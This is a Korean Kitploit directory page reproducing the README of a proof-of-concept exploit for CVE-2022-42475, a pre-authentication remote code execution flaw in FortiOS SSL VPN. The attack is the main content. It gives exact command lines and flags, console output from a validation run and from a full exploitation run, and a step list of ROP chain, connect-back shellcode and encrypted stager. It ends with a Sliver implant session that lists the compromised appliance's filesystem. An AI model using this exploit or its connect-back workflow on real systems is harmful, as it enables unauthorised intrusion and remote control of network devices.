Skip to content
KitploitKITPLOIT
도구블로그
Log in
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2022-42475-POC — FortiOS SSL VPN의 사전 인증 RCE인 CVE-2022-42475용 익스플로잇입니다. 검증, 무해한 확인, 그리고 원격 액세스를 위한 connect-back 셸코드 및 암호화된 바이너리 스테이저를 사용한 전체 악용을 지원합니다. | Kitploit
도구/GitHubGitHub/arthurhendrich/cve-2022-42475-poc
Vulnerability AnalysisExploitationShellcodeWeb SecurityPenetration TestingRed TeamingPayload Development
GitHubarthurhendrich/cve-2022-42475-poc

CVE-2022-42475-POC

FortiOS SSL VPN의 사전 인증 RCE인 CVE-2022-42475용 익스플로잇입니다. 검증, 무해한 확인, 그리고 원격 액세스를 위한 connect-back 셸코드 및 암호화된 바이너리 스테이저를 사용한 전체 악용을 지원합니다.

저장소 보기
97개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2022-42475

배경

이것은 블로그 게시물의 익스플로잇입니다: https://bishopfox.com/blog/exploit-cve-2022-42475

수정된 버전

이 익스플로잇 버전은 해커가 ROP 가젯 등에 필요한 메모리 주소를 제공하지 않으면 작동하지 않습니다. 이 데이터를 결정하는 작업은 Bishop Fox의 기밀 및 독점 정보이며, 이 익스플로잇과 함께 게시할 수 없습니다. 이해해 주시기 바랍니다!

작동 모드

  • 검증 전용, 익스플로잇 없음. 취약 여부 확인. 페이로드, 셸코드 없음.
  • 익스플로잇하지만 검증만 함. 대상이 익스플로잇 가능한지 확인하기 위해 무해한 연결-백 "ping" 셸코드를 실행합니다.
  • 연결-백 바이너리 스테이저와 함께하는 익스플로잇. 셸코드가 익스플로잇에 다시 연결하고, 암호화된 운영자 제공 바이너리 파일(일반적으로 https://gitub.com/BishopFox/Sliver)을 다운로드한 후 복호화하여 execve(binary_file)를 호출합니다.

참고: 현재 "검증 전용" 모드는 알려진 모든 FortiOS 버전에서 작동합니다. 그러나 익스플로잇은 100D 하드웨어의 FortiOS 6.0.4에서만 작동합니다. 저는 더 이상 BF에서 근무하지 않으므로 약 18,000개 대상을 지원하는 확장된 익스플로잇을 게시할 수 없습니다.

요구 사항

  • PyCrypto
  • pycryptodome
pip3 install PyCrypto
pip3 install pycryptodome

검증 전용

이것은 버그를 익스플로잇하려고 시도하지 않고 대신 충돌로 트리거합니다(원격 SSL VPN 데몬이 자동으로 즉시 재시작됨). 충돌은 휴리스틱하게 감지되어 운영자에게 보고됩니다.

-v 검증 플래그를 사용하여 실행합니다:

$ ./x.py -t 192.168.0.10 -p 8443 -v

    --[ CVE-2022-42475: FortiGate Remote Pre-auth RCE ]--
    --[ Bishop Fox Cosmos Team X                      ]--

[+] Running in validate-only mode. No RCE.
[>] Testing to see if target is vulnerable (may take 10 seconds)
[+] Target '192.168.0.10:8443' appears to be VULNERABLE

익스플로잇하지만 검증 (현재 FortiOS 6.0.4 on 100D 어플라이언스에서만 사용 가능)

이것은 버그를 트리거하고, ROP 체인을 배포하며, 셸코드로 점프합니다. 셸코드는 무해하며 다음과 같이 작동합니다:

  • Exploit connects to target and triggers the vuln to execute shellcode
  • Shellcode connects back to operator's IP:port
  • Shellcode sends a single "hello" byte to the exploit: 0xbf
  • Exploit delivers a small encrypted test payload to the shellcode (AES key is random each run)
  • Shellcode decrypts the payload and saves it to /tmp/x on the FortiGate appliance
  • Shellcode sends another single 0xbf byte to the exploit if payload decryption was successful
  • Exploit reads the byte and confirms code execution.

플래그:

-t           target host/IP
-p           target port
-e           exploit mode
-c           connect-back only mode
-H and -P    operator's IP:port  (required)
-s           software version of FortiOS (required)
-m           hardware model running FortiOS
-d           turn on debugging

소프트웨어 버전 6.0.4와 어플라이언스 모델 100D를 모두 선택한 예:

┌──(kali㉿kali)-[/mnt/hgfs/fortios/CVE-2022-42475]
└─$ sudo ./x.py -t 192.168.0.10 -p 8443 -e -c -H 192.168.0.99 -P 443 -s 6.0.4 -m 100D                   130 ⨯

    --[ CVE-2022-42475: FortiGate Remote Pre-auth RCE ]--
    --[ Bishop Fox Cosmos Team X                      ]--

[+] Generating random 128-bit AES key to encrypt payload
[+] Encrypting payload...
[+] Using cached shellcode. Edit ./x.py (look for 'shellcode.s') to force refresh.
[+] Configured for connect-back to 192.168.0.99:443
[+] Starting encrypted payload listener...
[+] Preparing for exploit...
[+] Sending request!
[+] Importing gadgets from 'exploit_data.json'
[<] Listener bound to port 443, waiting for connect-back...
[+] Validating gadgets...
[!] No functional hardware models were defined for FortiOS '5.2.14'. Removed.
[!] No functional hardware models were defined for FortiOS '5.6.9'. Removed.
[+] Imported 797 targets:
[-]   6.0.4     [  1 targets ]   <=== 100D
[-]   5.2.14    [ 47 targets ]
[-]   5.6.9     [ 60 targets ]
[-]   6.0.13    [ 68 targets ]
[-]   6.0.14    [ 67 targets ]
[-]   6.0.15    [ 58 targets ]
[-]   6.0.8     [ 67 targets ]
[-]   6.2.11    [ 69 targets ]
[-]   6.2.7     [ 75 targets ]
[-]   6.4.10    [ 71 targets ]
[-]   6.4.2     [ 62 targets ]
[-]   6.4.3     [ 61 targets ]
[-]   6.4.6     [ 73 targets ]
[-]   6.4.9     [ 72 targets ]
[-]   7.0.4     [ 53 targets ]
[+] Starting exploit
[<] Incoming request from 192.168.0.10:22470
[<] Received hello packet from target!! Model #: 100D
[<] Sending encrypted payload of 36 bytes
[<] Finished sending payload (36 bytes), waiting for response...
[<] Received the expected response ('100D') from 192.168.0.10
[<] Target is VULNERABLE with 100% confidence.
[+] All done!

-m으로 하드웨어 모델을 선택하지 않으면 익스플로잇이 지정된 소프트웨어 버전에 대해 모든 하드웨어 대상을 무차별 대입합니다.

전면 열핵전쟁

  • 운영자가 Sliver 임플란트 바이너리(Linux 기반)의 위치를 지정합니다.
  • Exploit connects to target and triggers the vuln to execute shellcode
  • Shellcode connects back to operator's IP:port
  • Shellcode sends a single "hello" byte to the exploit: 0xbf
  • Exploit encrypts Sliver binary and sends it to the shellcode
  • Shellcode decrypts the binary and saves it to /tmp/x
  • Shellcode sends a "success" 0xbf byte to the exploit
  • Exploit reads the byte and confirms code execution
  • Shellcode calls execve("/tmp/x")
  • ???
  • Profit!

플래그:

-t           target host/IP
-p           target port
-e           exploit mode
-f filename  /path/to/binary/to/execve/on/target
-H and -P    operator's IP:port for connect-back (required)
-s           software version of FortiOS (required)
-m           hardware model running FortiOS
-d           turn on debugging

Sliver:

carl@pluto:~$ ./sliver-server_linux

.------..------..------..------..------..------.
|S.--. ||L.--. ||I.--. ||V.--. ||E.--. ||R.--. |
| :/\: || :/\: || (\/) || :(): || (\/) || :(): |
| :\/: || (__) || :\/: || ()() || :\/: || ()() |
| '--'S|| '--'L|| '--'I|| '--'V|| '--'E|| '--'R|
`------'`------'`------'`------'`------'`------'

All hackers gain living weapon
[*] Server v1.5.34 - d2a6fa8cd6cc029818dd8d9e4a039bdea8071ca2
[*] Welcome to the sliver shell, please type 'help' for options

[server] sliver > mtls -l 8888

[*] Starting mTLS listener ...

[*] Successfully started job #1

Exploit:

$ ./x.py -t 192.168.0.10 -p 8443 -e -f implant5 -H 192.168.0.99 -P 443 -s 6.0.4 -m 100D

    --[ CVE-2022-42475: FortiGate Remote Pre-auth RCE ]--
    --[ Bishop Fox Cosmos Team X                      ]--

[+] Exploit will attempt to execve("implant5") on the target
...
[<] Target is VULNERABLE with 100% confidence.
[+] All done.

다시 Sliver에서:

[*] Session d8d5344b implant5 - 192.168.0.10:3500 (Burnet) - linux/amd64 - Mon, 06 Mar 2023 22:18:30 MST

[server] sliver > use d8d5344b-c666-4c60-9e33-5ce50eb82cad

[*] Active session implant5 (d8d5344b-c666-4c60-9e33-5ce50eb82cad)

[server] sliver (implant5) > whoami

Logon ID: <err>

[server] sliver (implant5) > ls

/ (19 items, 10.0 KiB)
======================
-rw-r--r--   .ash_history        590 B  Tue Jan 31 11:31:57 +0000 2023
drwxr-xr-x   bin                 <dir>  Tue Jan 31 11:04:35 +0000 2023
drwxr-xr-x   data                <dir>  Tue Jan 31 05:24:10 +0000 2023
drwxr-xr-x   data2               <dir>  Tue Jan 31 11:40:01 +0000 2023
drwxr-xr-x   dev                 <dir>  Tue Jan 31 05:26:16 +0000 2023
Lrwxrwxrwx   etc -> data/etc     8 B    Mon Jan 07 18:03:23 +0000 2019
Lrwxrwxrwx   fortidev -> /       1 B    Mon Jan 07 18:03:23 +0000 2019
Lrwxrwxrwx   init -> /sbin/init  10 B   Mon Jan 07 18:03:23 +0000 2019
drwxr-xr-x   lib                 <dir>  Mon Jan 07 18:03:30 +0000 2019
Lrwxrwxrwx   lib64 -> lib        3 B    Mon Jan 07 18:03:23 +0000 2019
drwxr-xr-x   migadmin            <dir>  Tue Jan 31 05:23:26 +0000 2023
dr-xr-xr-x   proc                <dir>  Tue Jan 31 05:23:13 +0000 2023
drwx------   root                <dir>  Mon Jan 07 17:17:34 +0000 2019
drwxr-xr-x   sbin                <dir>  Tue Jan 31 05:23:27 +0000 2023
drwxr-xr-x   security-rating     <dir>  Mon Jan 07 18:01:04 +0000 2019
drwxr-xr-x   sys                 <dir>  Tue Jan 31 05:23:27 +0000 2023
dtrwxrwxrwx  tmp                 <dir>  Tue Jan 31 11:40:01 +0000 2023
drwxr-xr-x   usr                 <dir>  Tue Jan 31 05:23:27 +0000 2023
drwxr-xr-x   var                 <dir>  Tue Jan 31 05:24:07 +0000 2023

Sliver가 <err>를 반환하는 것은 FortiOS가 대부분 Linux와 비슷하지만 항상 예상대로 작동하지는 않기 때문입니다. 이는 Sliver가 아닌 FortiOS의 문제입니다.

더 많은 버전 곧 지원 예정

저는 더 이상 Bishop Fox에서 근무하지 않으므로 업데이트는 BF github를 확인하시기 바랍니다.

도구 다운로드